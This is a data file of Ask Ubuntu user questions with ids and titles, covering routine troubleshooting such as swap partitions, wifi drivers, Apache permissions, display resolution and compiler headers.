382906	performance tuning - multiple swap partitions ? ( command-line )	summary does ubuntu take advantage of multiple swap partitions on separate physical media , from a load sharing point of view ? i.e . if one drive with a swap partition is burdened with i/o , will it utilise ( other ) swap space that resides on a different physical hard drive ? background building a headless home server ( command-line only responses , please ! ) . i usually put the o/s , the virtual/swap space and apps+data each on separate drives . while i think i 've got directories and mount points clear ( even managed to automount an nfs folder from a nas ) , swap still seems a little hazy to me ... the ubuntu install sequence partitioned my main drive with lvm [ still unsure if lvm was the best choice for a headless server ; but this is not a question , just an observation ] i 've got two additional drives i 'd like to use . while i see guides for gparted , detail regarding fdisk does n't seem as thorough . i realise there 's also the `` swappiness '' setting , but i 'm more curious about the possible benefits if ubuntu is sufficiently `` device-aware '' to take into account an i/o burdened device vs. an idle one , should it have multiple swap areas at its disposal .
382908	terminal autocompletion 'tab ' not working as intended ?	i know this has been discussed on other posts but my problem does not seem to be fully resolved and i do not have permission to add a comment to those posts yet : ( listed on help.ubuntu.com > usingtheterminal > save on typing : tab : `` it autocompletes any commands or filenames '' . after following the advise from apt-get autocomplete i get results after pressing tab twice but no auto completion for commands or files . running xubuntu 13.04 .
382915	repost screencasts for lubuntu ? ( blip have removed them )	lubuntu documentation lists quite a few screencasts - however since nov 7 , 2013 links are redirected to a blip account removed notice . looking at their terms of use , perhaps they considered it was `` advertising a product '' ? ? regardless of blip , are the screencasts for lubuntu likely to be reposted ( presumably , on youtube or similar ? ) ( ps : not sure if this question belongs in meta or not ... )
382917	how can i use the python gstvideo module in 12.04 ?	i 'm trying to get the gstreamer1.0 demos to work on 12.04 , python 3.2.3 and am getting the following ( precise ) raymond @ localhost : ~/workspace/nexense $ python video-player-1.0.py \ error : root : could not find any typelib for gstvideo traceback ( most recent call last ) : file `` video-player-1.0.py '' , line 11 , in < module from gi.repository import gdkx11 , gstvideo importerror : can not import name gstvideo afaik i have installed the recommended packages from the gstreamer ppa sudo add-apt-repository ppa : gstreamer-developers/ppa sudo apt-get install gstreamer1.0* and i then try to add in the packages explicitly named on the novacut porting guide , the closest thing to a canonical source i could locate : sudo apt-get install python-gi python3-gi \ gstreamer1.0-tools \ gir1.2-gstreamer-1.0 \ gir1.2-gst-plugins-base-1.0 \ gstreamer1.0-plugins-good \ gstreamer1.0-plugins-ugly \ gstreamer1.0-plugins-bad \ gstreamer1.0-libav which actually fails to find some of the listed packages e : unable to locate package gstreamer1.0-tools e : could n't find any package by regex 'gstreamer1.0-tools' e : unable to locate package gir1.2-gstreamer-1.0 e : could n't find any package by regex 'gir1.2-gstreamer-1.0' e : unable to locate package gir1.2-gst-plugins-base-1.0 e : could n't find any package by regex 'gir1.2-gst-plugins-base-1.0' e : unable to locate package gstreamer1.0-libav e : could n't find any package by regex 'gstreamer1.0-libav' does anyone have gstreamer 1.0/python/12.04 working ?
382919	102.04 lxc unable to create macvlan	i 'm having problems creating a macvlan for a container on 12.04 . in a terminal it works fine : $ > ip li add link eth0 mac0 type macvlan but when in a container config it give the error : lxc-start : failed to create macvlan interface 'mcfxo9nn ' on 'eth0 ' : invalid argument lxc-start : failed to create netdev lxc-start : failed to create the network lxc-start : failed to spawn 'container1' lxc-start : no such file or directory - failed to remove cgroup '/sys/fs/cgroup/cpuset//lxc/container1' my container config file looks like : lxc.network.type = macvlan lxc.network.macvlan.mode = bridge lxc.network.flags = up lxc.network.link = eth0 lxc.network.veth.pair = c1macvlan lxc.network.name = eth0 lxc.network.hwaddr = 08:13:27 : e5 : a2 : ee lxc.utsname = container1 lxc.devttydir = lxc lxc.tty = 0 lxc.pts = 1024 lxc.rootfs = /var/lib/lxc/container1/rootfs lxc.mount = /var/lib/lxc/container1/fstab lxc.arch = amd64 lxc.cap.drop = sys_module mac_admin # lxc.pivotdir = lxc_putold lxc.cgroup.devices.deny = a # allow any mknod ( but not using the node ) lxc.cgroup.devices.allow = c * : * m lxc.cgroup.devices.allow = b * : * m # /dev/null and zero lxc.cgroup.devices.allow = c 1:3 rwm lxc.cgroup.devices.allow = c 1:5 rwm # consoles lxc.cgroup.devices.allow = c 5:1 rwm lxc.cgroup.devices.allow = c 5:0 rwm # lxc.cgroup.devices.allow = c 4:0 rwm # lxc.cgroup.devices.allow = c 4:1 rwm # /dev/ { , u } random lxc.cgroup.devices.allow = c 1:9 rwm lxc.cgroup.devices.allow = c 1:8 rwm lxc.cgroup.devices.allow = c 136 : * rwm lxc.cgroup.devices.allow = c 5:2 rwm # rtc lxc.cgroup.devices.allow = c 254:0 rwm # fuse lxc.cgroup.devices.allow = c 10:229 rwm # tun lxc.cgroup.devices.allow = c 10:200 rwm # full lxc.cgroup.devices.allow = c 1:7 rwm # hpet lxc.cgroup.devices.allow = c 10:228 rwm # kvm lxc.cgroup.devices.allow = c 10:232 rwm any suggestions appreciated
382920	i do not like paypal . any alternatives to support ubuntu ?	i want to help with a donation to you good people but can not understand why you support the worst payment system in the world . kindly give me an alternative .
382922	dual boot on mac , factory efi or other booter	should i use bootcamp to create the second partition for ubuntu or go with refit ( or whatever was the name of that open boot manager ) if i want dual boot on a macbook pro ?
382925	network problems with packard bell easynote te	i have a really weird problem . installed ubuntu 13.10 and everything worked fine . then i tried to connect by wifi to a dlink router dir655 . then the wifi network went down and i could n't start it again . the thing is that people with other computers can connect to that router . we disconected the dlink router and tried to connect to a tp-link router impossible . then i waited a while then it worked again . so ... i started the dlink router again and same thing happened . do you have any advise to give me ? is the computer broken ? ( it is brand new ) . should also mention that when the wifi works the led indicator on glows orange but the other leds glow blue . is that important ?
382926	multithreaded http downloader	i am looking for a command line tool that can download multiple urls with multiple threads e.g . wget2 -n 5 http : //stackoverflow.com/ http : //askubuntu.com/ http : //bobo.com/ where -n = number of threads . i have come across axel , but when i give it multiple urls , it only downloads one . i will be downloading html files .
382927	how do i toggle screen geometry with hotkeys ?	my main computer is a laptop with an external monitor and i need set up hotkeys to switch between two display modes : external monitor only ( 1920*1080 ) internal + external monitor ( 1280*800 + 1920*1080 ) ( not mirror mode ) fn+f7 does similar things for me , but it toggles between internal only internal + external ( mirror mode ) external only i 'd rather add dedicated hotkeys for two of themodes i need . how do i do it ? my system is ubuntu 13.04 64-bit on thinkpad x200 .
382928	ubuntu-gnome 13.10 title bar stuck	i installed compiz and ccsm to try and change something , but that did n't work . the minute i installed compiz , my title bars went orange , and no changing of themes will help them . example : i 've installed gnome-tweak-tool and gnome-themes-standard , but changing the theme did n't work . i downloaded a custom shell theme but switching to it kept the screwed up title bar . i 'm just trying to get the regular adwaita theme back , but now i 'm stuck with these ugly title bars ... what can i do ? i tried purging the theme files , and reinstalling , nothing helped .
382930	ubuntu corrupt path	so i modified profile file under /etc/ and now i can not use commands like sudo , ls , etc. , but i can not modify this file without sudo . the question is : how can i get to sudo and gedit . i imagine it like this : ./pathtosudo ./pathtosu ./pathtogedit /etc/profile
382931	how to remove legal notice from motd / banner for non-root users	problem : the following text is shown for all non-root users when logging in via ssh : the programs included with the ubuntu system are free software ; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright . ubuntu comes with absolutely no warranty , to the extent permitted by applicable law . configuration : my /etc/ssh/sshd_config includes : printmotd no printlastlog no printmotd no and printlastlog no are overriden by pam in /etc/pam.d/sshd session optional pam_motd.so session optional pam_lastlog.so never showfailed /var/run/motd is symlinked to /etc/motd : /etc/motd - > /var/run/motd the folder /etc/update-motd.d/ is empty ! question : how can i disable the display of the above notice for non-root users ?
382933	cant access the internet	i am new user of ubuntu . almost everything is working fine , but i ca n't access the internet . i am connected to my home wifi , but ca n't access internet . wifi is working fine on windows 8 and cable connection is ok too . the laptop is a lenovo g580 and wireless adapter is broadcom bcm4313 . i did n't install any drivers but in system info i can see i am using 3rd party drivers . how can i get the internet to work ?
382934	apache 404 permission denied but why ?	i have been fighting an apache server for 2 days , trying to figure out why this thing keeps denying access to the server . check out the settings : < virtualhost 192.168.15.4:80 > documentroot `` /var/www/phreebooks '' servername billing.website.com ( omitted for security ) < directory `` /var/www/phreebooks '' > allow from all options +indexes < /directory > < /virtualhost > file permissions throughout the entire subdirectory , assigned with chown -r www-data : www-data phreebooks : drwxr-xr-x 8 www-data www-data 4096 2013-11-26 21:11 phreebooks & drwxr-xr-x 5 www-data www-data 4096 2013-11-26 21:57 install as soon as i reinstalled the webserver , i got the `` it works '' index.html . but when i try to run the install script at billing.webserver.com/install/install.php , i get : 403 : you do n't have permission to access /install/install.php on this server . i tried creating a test file , test.php , in the /var/www/phreebooks directory . it allowed me to access the file , but when i move it into any subdirectory , it gives the error , above , access denied . i have tried completely stripping the apache server out , using apt-get purge [ apache packages ] . which everything was removed and then reinstalled . it is having no effect . i 've never had this problem with an apache server , before . please let me know if there are any more details you need ...
382935	how do i convert image and audio into avi video file ?	i need to convert image and audio into avi video files for use with a video mixing tool that only accepts avi video . how do i : convert mp3 audio to avi without video channel convert jpg image to avi without sound without unnecessary re-encoding , if possible . also , i think i can use black background image as an input , but i 'd rather do without video channel altogether , if possible . i would prefer a simple command-line solution , if possible .
382939	should i put .htaccess rules in 000-default or httpd.conf ?	i 'm trying to move all .htaccess rules to httpd.conf . problem with that is httpd.conf is blank ( apparently this is by default-i 'm using 12.04 ) . i checked apache2.conf and found that httpd.conf was included so in theory i guess i could include my rules in httpd.conf ? ? ? however , i also read that i can include the rules in /etc/apache2/sites-enabled/000-default . in my case i am only running one website on the server ( although this will change later ) . questions which file should i place my .htaccess rules into ? ? are there any other files that i could store .htaccess rules in ? ? ? update : i do n't wish to use .htaccess for my rules , unless there are some really good reasons for doing so .
382940	avs compatible media player	the nullsoft advanced visualization studio was opensourced some time ago ( https : //sourceforge.net/projects/avs/ ) . i know xmbc ships evalib and supports that kind of visualization plugin . but i was wondering if there is another media player that has this capabillity .
382943	how install ubuntu on already existing ubuntu partition	i have a laptop running windows 8 and ubuntu 12.10 but i have issues with installing programs in ubuntu and the only option is to reinstall . i do not want to format my laptop , i.e . my windows 8 should stay . my desire is to install ubuntu afresh on the partition where it is now without further partitioning . how do i install over the existing installation ? this question was flagged a duplicate but i the other post on a similar did not address my issue . sorry for the confusion guys . the link was really helpful . many thanks .
382945	ca n't change resolution higher than 1152x864 xrandr gives me error	i just installed 12.04 lts ( after having troubles with 13.10 ) , and i ca n't set the resolution of my second screen higher than 1152ń 864 , even though the monitor can support 1280x1024 . when i try to add the mode with xrandr -- addmode i get the following error : aandevski @ aandevski-g41d3 : ~ $ xrandr -- addmode dvi-i-0 1280x1024 x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 31 current serial number in output stream : 32 i 'm using nvidia geforce gt240 with proprietary version 319 drivers .
382950	launching rmid problem on ubuntu 12.04	i have java version `` 1.6.0_21 '' java ( tm ) se runtime environment ( build 1.6.0_21-b07 ) java hotspot ( tm ) client vm ( build 17.0-b17 , mixed mode ) installed . when i type rmid in the command line , i get this error : activation.main : warning : sun.rmi.activation.execpolicy system property unspecified and no execpermissions/execoptionpermissions granted ; subsequent activation attempts may fail due to unsuccessful execpermission/execoptionpermission permission checks for documentation on how to configure rmid security , refer to : http : //java.sun.com/j2se/1.4/docs/tooldocs/solaris/rmid.html http : //java.sun.com/j2se/1.4/docs/tooldocs/win32/rmid.html naturally , neither link works . i need rmid for a remote client/server project i 'm working on . any ideas to why i 'm getting this error ?
382953	making ubuntu installation with mac terminal	i 'm trying to create a dual boot for ubuntu and windows 7 . currently i only have a macbook with os 10.7.5 installed , this means that i have to use the terminal in order to create an ubuntu booting usb for live booting . according to a website i found i need to do the following : hdiutil convert -format udrw -o /volumes/no name.img /users/thijs/downloads/ubuntu-12.04.3-desktop-amd64.iso however this returns the error : hdiutil : convert : only a single input file can be specified usage : hdiutil convert -format < format > -o < outfile > [ options ] < image > hdiutil convert -help does anyone know how to fix ?
382954	should i remove system hdd with windows 7 truecrypt encrypton before making it dual boot with ubuntu ?	the system hdd is just one partition , windows 7 installed and the whole partition encrypted by truecrypt . should i remove that before making new partition and installing ubuntu on it ( dual boot ) infact will i even be able to make new partition ?
382956	mouse working weird on ubuntu 12.04	i have a tracer ghost mouse and it is working on windows 7 professional and ubuntu 12.04 on my previous laptop . on my new computer mouse is acting weird . when mouse goes up , cursor is going to the right , when mouse goes left , cursor is going down , and right button on a touchpad is n't working . it is happening only on ubuntu on new computer . other mouse was working fine . it is also happening at windows for a while after turning on the computer , but after a while everything is working fine . what can i do ?
382958	ca n't install wifi driver in 12.04	i have a dell inspiron 15 3521 with a qualcomm atheros qca9565 / ar9565 wireless network adapter inside . after an update the wifi broke and i can not seem to fix it . i tried to follow the steps from this thread where somebody has a similar problem to build the driver , but on make it gives me an error about redefinition of `` kmalloc_array '' even after make clean ( i tried to build it previously in fact ) . the device is not hardware blocked , rfkill list outputs : 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no however , lshw -c network displays this as a result for the wifi adapter . *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c057ffff memory : afb00000-afb0ffff and there is no driver=ath9k or whatever it must be . edit : lsmod |grep mac80211 gives the following result : mac80211 557654 1 ath9k cfg80211 219204 3 ath9k , mac80211 , ath compat 20099 9 ath9k , mac80211 , ath9k_common , ath9k_hw , cfg80211 , rfcomm , bnep , btusb , bluetooth how can i fix this ? edit2 : uname -r outputs 3.2.0-56-generic lspci -nn |grep 0280 outputs 02:00.0 network controller [ 0280 ] : qualcomm atheros qca9565 / ar9565 wireless network adapter [ 168c:0036 ] ( rev 01 )
382960	why are n't the drivers for broadcom preinstalled ?	as broadcom wireless adapters are installed in most laptops , it stands to reason that the drivers , firmware etc . should be preinstalled as part of the installation process . i am aware that they are proprietary , but so are other the other items when the option is checked at the beginning of the installation .
382962	gui not showing drives on the mycomputer page	in ubuntu 12.04 unity bar , when i click folder it switches to `` my computer '' like page , but i ca n't see any drives associated with it , like windows and other drives . which package is responsible for this ?
382967	can i install onto a flash drive ?	okay , so i recently found out how to install the xubuntu .iso onto a flash drive . i proceeded to do the live version from the flash drive . i wanted to actually install on the flash drive ( where it would be a user and settings and stuff from the flash drive itself ) . i ended up installing next to ubuntu ... but then i got impatient and shut down , corrupting ubuntu ( i think ) so i had to install xubuntu over it ... anyway , i want to know if i can install onto the flash drive itself , so it has it 's own filesystem files and all . is that possible ? or will the live user function do all of that ?
382971	headset jack not working even when using sound > test	i have ubuntu 13.04 and the sound has never worked in this os/version for the headset jack . it does work with normal speakers . the same pc was windows before and it was working ok so no hardware problem it does work with usb headphone i tried killing pulseaudio program i tried going to sound > select output device > test > nothing sounds from the headset it has following output devices : - digital output ( s/pdif ) > no sound.. - headphones > sound comes from speaker - analog output/built-in > sound comes from speaker - analog output/c-media usb > usb sound ok . tried opening alsamixer ( v1.0.25 ) and setting high sound volume for all devices , including headphones . any tips ? thanks in advance
382973	ubuntu 13.4/13.10 shutdown fails	on both 13.4 ( and now after upgrading to 13.10 ) i find that i can not cycle the machine with a reboot because during the shutdown process the step of `` killing all remaining processes '' fails : i can force a reboot with reboot -f that works but i do n't want to reboot without the benefit of a graceful shutdown process ( which the -f imposes ) . i guess it 's also worth stating that the only major software that i 've put on top of the base ubuntu install is : mysql 2.4.6 couchbase 2.1.x php 5.3.x as you can see from the screenshot it appears that mysql and couchbase have successfully shutdown and obviously php is n't a server process so i 'm a little bit unsure what to do next .
382983	ubuntuone not syncing but other folders do	i have ubuntuone on two machines . on my secondary machine the pictures folder downloaded just fine but the ubuntone folder remains empty . i put a file in it to see if it would upload and it did not . how can i get the ubuntone folder to sync ?
382985	ca n't set resolution back to 1080p	i have some trouble with upgrading to ubuntu 13.10 from 13.04 . i fixed already multiple problems , but i 'm getting stuck with this one . my screen resolution is n't getting higher than 1280x1024 . unity do n't work at all , but some time before the upgrade i tried kde , what i 'm using now . the interface do n't have a low resolution , but there is a black border around the screen with every resolution i tried . ( while typing this i changed the resolution to 640 , and now the buttons are outside of my screen : p ) btw , the black borders do n't disappear . thanks in advance !
382989	sony vaio vgn-fj170 , ubuntu 12.04 lts , fn keys combinations doesnt work	i installed ubuntu 12.04 lts on my old sony vaio vgn-fj170 . my problem is that laptop ca n't detect the press of fn key . i investigated a bit and found that at least some functionality of sony-laptop module in kernel works - display brightness could be changed through ubuntu settings ( and it works through changing setting file in /sys/devices/platform/sony-laptop . i tried to see if os could detect fn+2=f2 and other things by using acpi_listen , no luck . thank you , alex update . did some testing and found following : sony-laptop driver actually works . after pressing fn+fkey combination file /sys/devices/platform/sony-laptop/fnkey changes with specific codes : fn+f2 - ( audio mute ) - fnkey value is 1 ; fn+f3 - ( vol down ) - fnkey value is 2 ; fn+f4 - ( vol up ) - fnkey value is 4 ; fn+f5 - ( brightness down ) - fnkey value is 8 ; fn+f6 - ( brightness up ) - fnkey value is 16 ; fn+f7 - ( video output change ) - fnkey value is 32 ; fn+f10 - ( zoom ) - fnkey value is 1024 ; fn+f12 - ( sleep ) - fnkey value is 64 ; no other key combination changes value of /sys/devices/platform/sony-laptop/fnkey i guess it is possible to write a daemon which will watch content of this file and translate it to something , which in turn could be detected by window manager and used to trigger keyboard shortcuts ... but this is well beyond my capabilities ... could someone please help ? changing of brightness works as well , but i do n't know how to actually tie it to daemon or somehow make it accessible through gui ... here is the details : file /sys/class/backlight/sony/brightness controls actual brightness of the screen ( values are integers from 0 [ lowest ] to 7 [ highest ] ) . command sudo sh -c 'echo `` 0 '' > /sys/class/backlight/sony/brightness ' will change it to the lowest setting . please help me to utilize this in gui . thank you in advance ! second update . i tried to watch for key press event . no success in both acpi_listen and xev ...
382990	ubuntu installation problems	i installed ubuntu 12.04 . it got installed and at the end of installation it asked me to restart . i clicked the restart button simultaneously i removed the usb flash drive which i used for installation . after restarting it is directly switching to windows and not to asking me for the choice . i thought that ubuntu is lost and i tried one more time . while installing second time during the process of installation it asked me options like to replace ubuntu or windows or ubuntu or both . so i confirmed that ubuntu is there inside the laptop . please tell me how to access to my ubuntu which is there in my laptop . my laptop model g580 . thanks in advance .
382992	rkhunter sends no email	rkhunter sends no email i installed rkhunter on a ubuntu 12.04.3 server sudo apt-get install rkhunter it installed the 1.3.8 version of rkhunter sudo apt-show-versions rkhunter rkhunter/precise uptodate 1.3.8-10 rkhunter gives back some messages sudo rkhunter -c -- rwo but i do not get any daily email
382997	installing ubuntu onto my samsung galaxy gt i9300	i have explored several websites which claim to give step by step instructions for installing ubuntu , however there seems to be no standard operating procedures between the various models of phone available . i was therefore hoping you could direct my to a site which could walk me through the exact procedure for installing ubuntu onto my samsung galaxy gt i9300 .
382998	only see the desktop with ubuntu 13.10	my first install was 13.10 , and everything was working fine a few days . only last in the afternoon , i tried logging into ubuntu , i entered my password , but after it accepted it , it only showed my cursor and the login wallpaper and one folder . do you know any solution regarding the topic ? thank you , tamas
383001	“sorry , ubuntu * has experienced an internal error.” /usr/bin/compiz	i 'm new to ubuntu . i have tried to install ubuntu 13.10 in virtualbox with base os windows 7 . the installation was fine and i did tick on download updates and third party app . after this it completed installation and rebooted , ubuntu load up to just wallpaper and cursor on the screen . after some time it showed error : “sorry , ubuntu 13.10 has experienced an internal error.” /usr/bin/compiz . what to do now please .
383002	mobile broadband usb stick not working suddenly	my huawei mobile broadband dongle was working on both my computers until a week or so ago . now , it only works on my laptop . my laptop is running ubuntu 13.04 , my desktop is running 13.10 ( the dongle has been working on it since it was upgraded , it stopped working more recently than that ) . it appears in the output of lsusb , like this : bus 003 device 009 : id 12d1:1f01 huawei technologies co. , ltd . but no connection materialises . it does n't give me the `` connected to wired network '' notice . the computer has usb2 and 3 ports , and it does n't work in any of them . despite having two computers running ubuntu , i am quite stupid so be gentle with me . advice much appreciated !
383004	html5 - chrome ati hardware acceleration	i would like to know if the hardware acceleration of html5 video is support in chrome for ubuntu 64 bits with an ati graphic card . if yes , i would like to know how to enable it . i am using the fglx drivers . there is no information on http : //wiki.cchtml.com by the way does the video acceleration is supported ? do i need to add the xvba-va driver ( va-api ) ? here is my configuration , laptop asus 1215b , e450 , hd6320 , 4gb , ubuntu 13.10 64bits . thank you and have a nice day ,
383008	do i really have to do a fresh install every 6/9 months ? updating causes problems	perhaps the only thing that still tethers me to mac osx and windows 7 , aside from specific program suites , is the fact that i am not required to upgrade every few months . windows and osx silently ( if you choose ) roll out security updates to your system to give you the latest features to extend the longevity of your install . i do n't feel that i get this with ubuntu . i 'm forced to choose whether i want the latest release or lts . is there no `` best of both worlds '' option ? is there an easier method of upgrading that i 'm missing ? i 've just had so many problems with botched configs that it seems easier to just be easier to wipe the drive , rather than upgrade . i know it 's lack of foresight on my part , but i forgot to back up my samba configs on the last go . even now do i still find myself crawling back into my configuration to change something .
383012	unable to boot ubuntu - dual environment with raid	my new desktop has the following configuration ( 1 ssd with windows 7 installed ) and a 2tb pair of raid 1 disks . windows is installed on the ssd ( 120gb ) which includes a boot partition . i have split the 2tb `` raid-1 ) disk into 3 partitions ( large ntfs partition ) , and 2 smaller partitions for ubuntu ( swap & ext4 ) i installed ubuntu ( or i think i have ) installed ubuntu on the two partitions and everything seems to be there , but i do not get a the grub 2 boot manual , and the installation ubuntu does not seem to detect windows 7 presence and i do not get the prompt at the end of the installation to ask where i would like to store the boot . indeed , the only option i get for defining the boot option is on the raid disks , not on the ssd . i have tried to resolve the problem using boot-repair-disk and it hangs on the line `` sudo chroot `` /mnt/boot-sav/mapper/** '' apt-get purge -y -force-yes grub*-common shim-signed linux-signed* .
383014	stop mpg123 without being in its shell ?	i 'm using mpg123 to play a list of mp3 files through my intercom using a home server on ubuntu 12.04 . i 'm using this command : mpg123 *.mp3 -- loop 0 & with the & appended because i 'd like to be able to close my ssh window and have the music keep playing . however , i have n't been able to find a way to make the music stop when i want it to . is there a way for a cron job to come back hours later and kill the music ? if anyone has alternative players that would allow me to do this , that would be great too !
383016	why i am not able to update my system with sudo apt-get update command ?	i am trying to update using sudo apt-get update , but it do download some packages but after some times i get the following errors w : failed to fetch http : //ppa.launchpad.net/ravefinity-project/ppa/ubuntu/dists/precise/release.gpg could not connect to localhost:4001 ( 127.0.0.1 ) . - connect ( 111 : connection refused ) w : failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/dists/precise/release.gpg unable to connect to localhost:4001 :
383018	update dependency via source	i have a library which is a dependency for the disgusting goliath that is ros , and i need to update it to a newer version . i was hoping i could get some advice on what is the best approach : compile and install to a local directory , set include path ( headers ) , link time path , and run time path manually ? ( i really do n't want to do this , i would prefer my project to not have hardcoded paths ) update the dependency in apt using the sources . ( i would like to do this , but i have no idea whats the correct approach . i have a feeling it involves checkinstall though ) use a ppa has anyone had experience with this and what is the proper admin/project approach ? specific info -- ubuntu 13.04 ros hydro upgrade google 's protobuf from 2.4.1 to 2.5.0 ( repo - > source )
383019	hard drive data recovery	guys ! you might consider it irrelevant , but i do n't know any other website where i can ask this question . i manually damaged my hard drive . its bricked . i desperately need to recover the data . could anybody please suggest some data recovery companies in the united kingdom . please do n't remove this . i 'm very desperate on this . thans for reading . pleasw help .
383021	unable to start unetbootin	when trying to start unetbootin from the terminal using unetbootin , i get the following output : ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( unetbootin:2244 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_long_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_get_for_screen : assertion `gdk_is_screen ( screen ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_icon_theme_prepend_search_path : assertion `gtk_is_icon_theme ( icon_theme ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed ( gksu:2256 ) : gtk-critical ** : ia__gtk_settings_set_string_property : assertion `gtk_settings ( settings ) ' failed i get the prompt asking for my password but then nothing happens and when started using sudo unetbootin , the output is : unetbootin : can not connect to x server i have tried the following , but to no avail : bug report on launchpad seemed to be a similar problem i am unable to report the version of unetbootin as neither unetbootin -v nor unetbootin -- version are valid options and the man page does not information on doing this . is there a workaround to this ?
383023	installing rbenv apt-get vs git checkout	i 'm finding confliccting advice on how to install rbenv ( and ruby ) in recent ubuntu versions ( 13.10 ) . many guides suggest cloning from git , and updating bashrc etc . for example this guide on gorails.com . others suggest just using apt , with the universe repository enabled . for example this guide from install lion . what 's the difference , and pros and cons of each technique ?
383027	test install/uninstall	i somehow have a nvidia package ( possibly nvidia-common ) installed on my laptop with ati , which causes all opengl programs broken with error : xlib : extension `` nv-glx '' missing on display `` :0 '' . now i want to remove it , but synaptic will also remove ubunto-desktop . i am afraid i will kill my system . so this is a more general question : is there a way to test installing/uninstalling a package ? and how can i undo it just to be safe .
383029	clang++ ( version 3.3 ) lacks headers	this seems odd . take a simple c++ program # include < cmath > # include < iostream > int main ( void ) { std : :cout < < `` square root of 9 is `` < < sqrt ( 9 ) < < std : :endl ; } which passes fine with g++ ( 4.8 ) but fails to compile with clang++ ( 3.3 ) . edd @ don : /tmp $ g++ -o cmath cmath.cpp edd @ don : /tmp $ ./cmath square root of 9 is 3 edd @ don : /tmp $ clang++ -o cmath cmath.cpp in file included from cmath.cpp:2 : /usr/lib/gcc/i686-linux-gnu/4.8/../../../../include/c++/4.8/cmath:41:10 : \ fatal error : 'bits/c++config.h ' file not found # include < bits/c++config.h > ^ 1 error generated . edd @ don : /tmp $ i suspect i am missing something blatantly obvious . and i do have the relevant -dev package : edd @ don : /tmp $ columns=72 dpkg -l | grep `` clang\|llvm '' ii clang-3.3 1:3.3-5ubunt i386 c , c++ and objective-c compiler ( ii libclang-commo 1:3.3-5ubunt i386 clang library - common developmen ii libclang-commo 1:3.2repack- i386 clang library - common developmen ii libclang1 1:3.2repack- i386 clang library ii libclang1-3.3 1:3.3-5ubunt i386 clang library ii libllvm3.1 : i38 3.1-2ubuntu2 i386 low-level virtual machine ( llvm ) , ii libllvm3.2 : i38 1:3.2repack- i386 low-level virtual machine ( llvm ) , ii libllvm3.3 : i38 1:3.3-5ubunt i386 low-level virtual machine ( llvm ) , ii llvm-3.3 1:3.3-5ubunt i386 low-level virtual machine ( llvm ) ii llvm-3.3-dev 1:3.3-5ubunt i386 low-level virtual machine ( llvm ) , ii llvm-3.3-runti 1:3.3-5ubunt i386 low-level virtual machine ( llvm ) , edd @ don : /tmp $ edit : i had failed to check the bug tracking system , this is in in fact know at launchpad .
